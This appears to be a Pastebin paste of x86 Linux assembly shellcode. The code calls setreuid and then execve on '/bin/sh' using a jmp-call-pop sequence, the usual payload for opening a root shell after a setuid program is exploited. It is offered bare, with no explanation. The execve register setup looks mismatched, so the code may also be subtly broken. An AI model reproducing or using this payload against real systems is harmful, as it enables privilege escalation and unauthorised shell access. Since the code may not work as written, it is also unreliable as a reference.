Guest User

Untitled

a guest
Jan 9th, 2014
159
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. SECTION .data
  2.         global _start
  3. _start:
  4.         xor eax, eax
  5.         xor ebx, ebx
  6.         xor ecx, ecx
  7.         xor edx, edx
  8.         mov al, 70d
  9.         int 80h
  10.         jmp jump
  11. rev:
  12.         pop ecx
  13.         xor eax, eax
  14.         mov BYTE [ecx+7], al
  15.         mov DWORD [ecx+8], ecx
  16.         mov DWORD [ecx+12], eax
  17.         mov al, 11d
  18.         lea ebx, [ecx+8]
  19.         lea edx, [ecx+12]
  20.         int 80h
  21. jump:
  22.         call rev
  23. shell: db "/bin/sh011112222"
Advertisement
Add Comment
Please, Sign In to add comment